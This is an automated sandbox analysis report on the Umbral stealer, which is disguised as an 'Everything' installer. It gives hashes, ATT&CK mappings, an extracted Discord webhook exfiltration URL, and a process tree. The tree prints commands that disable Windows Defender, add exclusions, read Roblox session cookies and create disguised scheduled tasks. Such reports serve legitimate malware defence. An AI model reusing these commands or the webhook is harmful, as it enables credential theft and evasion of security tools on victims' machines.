umbral | c9d2459c5bd3e5044d4d625f92e30bfa475e11fe259fc00c0d4961f5ebe10f3b

Analysis

max time kernel
148s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
11/04/2025, 11:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GTTR6_Everything-1.4.1.1026.x64-Setup2.exe
Size

468KB
MD5

53e560338b0fabac1c89e7baf950046d
SHA1

517c82342d0e5ee0a581ff0db0e543c9cb9986a4
SHA256

c9d2459c5bd3e5044d4d625f92e30bfa475e11fe259fc00c0d4961f5ebe10f3b
SHA512

4216abf6d385c3f37889300dd9c8ec98215e7f8810806b2a306cd6e79747c720972b74026917ed5cc9a07e8c677aed2ad2ffc509290853eaa0ec4bc807a3843d
SSDEEP

12288:hGePVle8y4TKs/u6oZtL+EP855eLcCFdW8j+ctBIX0B:oITKoI8XeLcCFdW8j+ctBIXo

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1360210646112665720/qXg1qF4JZ6j3Rqqts-_rZSbjGedO1RuAq7HLooe-TstGKKIib9a91A7sjYj3Xa-Dhtsc

Signatures

Detect Umbral payload 3 IoCs

resource	yara_rule
behavioral1/files/0x00080000000242b6-23.dat	family_umbral
behavioral1/memory/732-25-0x0000000000400000-0x000000000047C000-memory.dmp	family_umbral
behavioral1/memory/1960-24-0x000002470FC60000-0x000002470FCA0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2148	powershell.exe
2220	powershell.exe
2644	powershell.exe
4960	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3078542121-369484597-920690335-1000\Control Panel\International\Geo\Nation	GTTR6_Everything-1.4.1.1026.x64-Setup2.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Executes dropped EXE 2 IoCs

pid	Process
116	Client.exe
1960	Umbral.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
8	discord.com
9	discord.com
11	pastebin.com
12	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com
20	icanhazip.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GTTR6_Everything-1.4.1.1026.x64-Setup2.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3988	cmd.exe
4084	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5508	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4084	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1464	schtasks.exe
2444	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
1960	Umbral.exe
4960	powershell.exe
4960	powershell.exe
2148	powershell.exe
2148	powershell.exe
2220	powershell.exe
2220	powershell.exe
4692	powershell.exe
4692	powershell.exe
2644	powershell.exe
2644	powershell.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe
116	Client.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	116	Client.exe
Token: SeDebugPrivilege	1960	Umbral.exe
Token: SeIncreaseQuotaPrivilege	3136	wmic.exe
Token: SeSecurityPrivilege	3136	wmic.exe
Token: SeTakeOwnershipPrivilege	3136	wmic.exe
Token: SeLoadDriverPrivilege	3136	wmic.exe
Token: SeSystemProfilePrivilege	3136	wmic.exe
Token: SeSystemtimePrivilege	3136	wmic.exe
Token: SeProfSingleProcessPrivilege	3136	wmic.exe
Token: SeIncBasePriorityPrivilege	3136	wmic.exe
Token: SeCreatePagefilePrivilege	3136	wmic.exe
Token: SeBackupPrivilege	3136	wmic.exe
Token: SeRestorePrivilege	3136	wmic.exe
Token: SeShutdownPrivilege	3136	wmic.exe
Token: SeDebugPrivilege	3136	wmic.exe
Token: SeSystemEnvironmentPrivilege	3136	wmic.exe
Token: SeRemoteShutdownPrivilege	3136	wmic.exe
Token: SeUndockPrivilege	3136	wmic.exe
Token: SeManageVolumePrivilege	3136	wmic.exe
Token: 33	3136	wmic.exe
Token: 34	3136	wmic.exe
Token: 35	3136	wmic.exe
Token: 36	3136	wmic.exe
Token: SeIncreaseQuotaPrivilege	3136	wmic.exe
Token: SeSecurityPrivilege	3136	wmic.exe
Token: SeTakeOwnershipPrivilege	3136	wmic.exe
Token: SeLoadDriverPrivilege	3136	wmic.exe
Token: SeSystemProfilePrivilege	3136	wmic.exe
Token: SeSystemtimePrivilege	3136	wmic.exe
Token: SeProfSingleProcessPrivilege	3136	wmic.exe
Token: SeIncBasePriorityPrivilege	3136	wmic.exe
Token: SeCreatePagefilePrivilege	3136	wmic.exe
Token: SeBackupPrivilege	3136	wmic.exe
Token: SeRestorePrivilege	3136	wmic.exe
Token: SeShutdownPrivilege	3136	wmic.exe
Token: SeDebugPrivilege	3136	wmic.exe
Token: SeSystemEnvironmentPrivilege	3136	wmic.exe
Token: SeRemoteShutdownPrivilege	3136	wmic.exe
Token: SeUndockPrivilege	3136	wmic.exe
Token: SeManageVolumePrivilege	3136	wmic.exe
Token: 33	3136	wmic.exe
Token: 34	3136	wmic.exe
Token: 35	3136	wmic.exe
Token: 36	3136	wmic.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeIncreaseQuotaPrivilege	4732	wmic.exe
Token: SeSecurityPrivilege	4732	wmic.exe
Token: SeTakeOwnershipPrivilege	4732	wmic.exe
Token: SeLoadDriverPrivilege	4732	wmic.exe
Token: SeSystemProfilePrivilege	4732	wmic.exe
Token: SeSystemtimePrivilege	4732	wmic.exe
Token: SeProfSingleProcessPrivilege	4732	wmic.exe
Token: SeIncBasePriorityPrivilege	4732	wmic.exe
Token: SeCreatePagefilePrivilege	4732	wmic.exe
Token: SeBackupPrivilege	4732	wmic.exe
Token: SeRestorePrivilege	4732	wmic.exe
Token: SeShutdownPrivilege	4732	wmic.exe
Token: SeDebugPrivilege	4732	wmic.exe
Token: SeSystemEnvironmentPrivilege	4732	wmic.exe
Token: SeRemoteShutdownPrivilege	4732	wmic.exe
Token: SeUndockPrivilege	4732	wmic.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 732 wrote to memory of 116	732	GTTR6_Everything-1.4.1.1026.x64-Setup2.exe	82
PID 732 wrote to memory of 116	732	GTTR6_Everything-1.4.1.1026.x64-Setup2.exe	82
PID 732 wrote to memory of 1960	732	GTTR6_Everything-1.4.1.1026.x64-Setup2.exe	83
PID 732 wrote to memory of 1960	732	GTTR6_Everything-1.4.1.1026.x64-Setup2.exe	83
PID 1960 wrote to memory of 3136	1960	Umbral.exe	85
PID 1960 wrote to memory of 3136	1960	Umbral.exe	85
PID 1960 wrote to memory of 808	1960	Umbral.exe	87
PID 1960 wrote to memory of 808	1960	Umbral.exe	87
PID 1960 wrote to memory of 4960	1960	Umbral.exe	89
PID 1960 wrote to memory of 4960	1960	Umbral.exe	89
PID 1960 wrote to memory of 2148	1960	Umbral.exe	91
PID 1960 wrote to memory of 2148	1960	Umbral.exe	91
PID 1960 wrote to memory of 2220	1960	Umbral.exe	93
PID 1960 wrote to memory of 2220	1960	Umbral.exe	93
PID 1960 wrote to memory of 4692	1960	Umbral.exe	95
PID 1960 wrote to memory of 4692	1960	Umbral.exe	95
PID 1960 wrote to memory of 4732	1960	Umbral.exe	97
PID 1960 wrote to memory of 4732	1960	Umbral.exe	97
PID 1960 wrote to memory of 4788	1960	Umbral.exe	99
PID 1960 wrote to memory of 4788	1960	Umbral.exe	99
PID 1960 wrote to memory of 3936	1960	Umbral.exe	101
PID 1960 wrote to memory of 3936	1960	Umbral.exe	101
PID 1960 wrote to memory of 2644	1960	Umbral.exe	103
PID 1960 wrote to memory of 2644	1960	Umbral.exe	103
PID 1960 wrote to memory of 5508	1960	Umbral.exe	105
PID 1960 wrote to memory of 5508	1960	Umbral.exe	105
PID 1960 wrote to memory of 3988	1960	Umbral.exe	107
PID 1960 wrote to memory of 3988	1960	Umbral.exe	107
PID 3988 wrote to memory of 4084	3988	cmd.exe	109
PID 3988 wrote to memory of 4084	3988	cmd.exe	109
PID 116 wrote to memory of 1224	116	Client.exe	110
PID 116 wrote to memory of 1224	116	Client.exe	110
PID 1224 wrote to memory of 1464	1224	CMD.exe	112
PID 1224 wrote to memory of 1464	1224	CMD.exe	112
PID 116 wrote to memory of 1900	116	Client.exe	113
PID 116 wrote to memory of 1900	116	Client.exe	113
PID 1900 wrote to memory of 2444	1900	CMD.exe	115
PID 1900 wrote to memory of 2444	1900	CMD.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
808	attrib.exe

C:\Users\Admin\AppData\Local\Temp\GTTR6_Everything-1.4.1.1026.x64-Setup2.exe
"C:\Users\Admin\AppData\Local\Temp\GTTR6_Everything-1.4.1.1026.x64-Setup2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:732
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1464
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2444
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4692
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4732
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4788
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2644
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5508
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4084

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5748

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
547df619456b0e94d1b7663cf2f93ccb

SHA1
8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

SHA256
8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

SHA512
01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e855de5861571374efc63dacc84638b

SHA1
54bc201ab83ab18ef4c8009b307ae7c6d041369e

SHA256
aaef6c1145f7994603ccc9477b801b498e77401e1a9e0e0e1e6a585c74fe7a2a

SHA512
db1e4028123b5991525d386d13b20011259e58db8cee4662714d6fe1b2ef48816f0fa2f8e36da3713a8aedb04cbaccf778aa4015cd2475b4371450cea73745bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
243108f8a57b9ea5e8449f382d21605e

SHA1
d2f0009ce295e6db9f6e57eb7e224a50f54710b4

SHA256
2709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94

SHA512
d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3332c2f747b79a54dc9f4867423e31c3

SHA1
de8440945ab0c382b6657dd2e6f50bbc2a4b73bd

SHA256
f8ddc8eddb53247304e5463829cbf8d1a420a77781237820efa0c94ab18612cd

SHA512
96fcc7c39335ce60da1f8db2ff9b62324d60080fb1a5a81262a26c311b78117bf85b481113800f88ac6a37b7ba26a7be510f3c098b26828c751974339a1e8835

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c523adc639d16ffb0f96cebc63eed858

SHA1
12ff3728fe7a266d00bea61357e168d1ac35fb8b

SHA256
3f3c9377b171cf14fcf2bfe2ef6ab7753c1470c8fe803fb73317fa3732c55df1

SHA512
36dd1d5df9f67a708087ae024f4088fbe6ed11859c65c896f4c7b40631e418646295078abe0bd1e7062b3dd5f333d8cf86a8542ef719e4b14feec877c60839ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
228KB

MD5
9d13457fe2154ed1c7c5d080b4e89d75

SHA1
813a1143530624a7ebb51eb041d8ab1b1349c428

SHA256
4433cbb68bb1948a9093af9d3e4ca43dd9d2e8ab1eb4ef172c84a18122211dbb

SHA512
4665ce02912a5d27a847b91fc7dc1a1cd215febe16fa2bd9d90694a9ce45d5475255cdd0d9e2d57c00b61bbdd94ffce6e71227d04530544591043216be48341b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
231KB

MD5
e4b51d29d135168fc262065999c10f6a

SHA1
8f7d8872ee04c47af338ea0fe8480a3e5be2d6bb

SHA256
72717c89182aa16055fca98ccb899f86084a888681cd5621dcdba99d08056c7c

SHA512
d539a85bdbd0bcaa52ed8483d124f61875eb1b28d5bd353087eee1332efd3bf948fcd672e77b06755ccb4af7c1783db87091d99f78da41f12f8187fd22927fb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1ont4ob.tkz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/116-148-0x0000000002560000-0x000000000256C000-memory.dmp

Filesize
48KB

Download
memory/116-22-0x0000000000430000-0x0000000000470000-memory.dmp

Filesize
256KB

Download
memory/116-109-0x00007FF9A83F3000-0x00007FF9A83F5000-memory.dmp

Filesize
8KB

Download
memory/116-14-0x00007FF9A83F3000-0x00007FF9A83F5000-memory.dmp

Filesize
8KB

Download
memory/732-25-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1960-51-0x000002472A380000-0x000002472A3F6000-memory.dmp

Filesize
472KB

Download
memory/1960-89-0x000002472A320000-0x000002472A32A000-memory.dmp

Filesize
40KB

Download
memory/1960-90-0x000002472A480000-0x000002472A492000-memory.dmp

Filesize
72KB

Download
memory/1960-53-0x000002472A4E0000-0x000002472A4FE000-memory.dmp

Filesize
120KB

Download
memory/1960-108-0x00007FF9A83F0000-0x00007FF9A8EB1000-memory.dmp

Filesize
10.8MB

Download
memory/1960-52-0x000002472A330000-0x000002472A380000-memory.dmp

Filesize
320KB

Download
memory/1960-26-0x00007FF9A83F0000-0x00007FF9A8EB1000-memory.dmp

Filesize
10.8MB

Download
memory/1960-24-0x000002470FC60000-0x000002470FCA0000-memory.dmp

Filesize
256KB

Download
memory/4960-27-0x000002447FC30000-0x000002447FC52000-memory.dmp

Filesize
136KB

Download